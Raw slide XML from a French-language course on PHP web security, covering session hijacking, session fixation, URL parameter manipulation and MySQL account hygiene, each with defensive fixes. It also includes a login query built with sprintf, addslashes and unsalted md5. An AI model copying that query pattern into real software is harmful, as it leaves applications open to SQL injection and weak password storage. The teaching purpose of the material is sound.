              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>// interroger le serveur pour comparer le mot de passe soumis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>$query = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>("SELECT * FROM users WHERE name='%s' AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>='%s';", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>), md5($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>));</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Rappels sur les sessions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Chaque session est identifiée par une chaîne appelée </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>session ID.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Création standard d’une session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>Client : requête HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>Serveur : réponse HTTP avec un champ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Set-Cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Set-Cookie : PHPSESSID=047e...c7ac ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>=/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>Client : stocke le cookie selon la convenance du navigateur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>Client : requête HTTP avec un champ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Cookie : PHPSESSID=047e...c7ac ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>Serveur : PHP remplit $_COOKIE et en déduit la session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Puis réponse HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Remarque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Par défaut, si PHP ne trouve pas PHPSESSID dans le cookie, il le cherche en GET ou POST.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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34888" y="2852936"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les attaques, ça sert à quoi ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="234579832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Vol de sessions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>(session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>hijacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Principe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>L’attaquant trouve le session ID d’autrui et usurpe la session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Causes possibles du vol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>XSS et donc lecture du cookie par JS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Couper l’accès JS au cookie (si </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>possible)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Si le navigateur le permet, sinon aucun effet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>ini_set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" smtClean="0"/>
              <a:t> (’ session .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>cookie_httponly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" smtClean="0"/>
              <a:t>’, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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i="1" dirty="0" smtClean="0"/>
              <a:t>Session fixation</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Principe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>L’attaquant impose à la victime de se connecter sur le site avec un session ID fixé.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Comment ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>En fixant le session ID en GET ou POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>En intervenant sur le cookie par </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Plus besoin de voler la clé, l’attaquant la connait déjà !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Solution : Il suffit de supprimer tout nouveau </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>session ID (potentiellement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>dangereux) pour en recréer un autre</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>session_regenerate_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Manipulation d’URL</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="165025" y="2071678"/>
            <a:ext cx="8693255" cy="4572008"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5143504" y="2143116"/>
            <a:ext cx="3571900" cy="4647426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Le pirate remarque que le paramètre du compte utilisateur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>acct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> est à 6065</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Peut être utilisé par tous les utilisateurs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Accéder à des informations privées </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Accéder à des actions privées </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Accéder à des pages non autorisées </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Traverser des répertoires</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>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Configuration MySQL</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Créer des comptes à permissions réduites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Eviter de donner un même compte MySQL à 2 applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Sauvegarder !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>automysqlbackup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> est idéal sous Unix.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
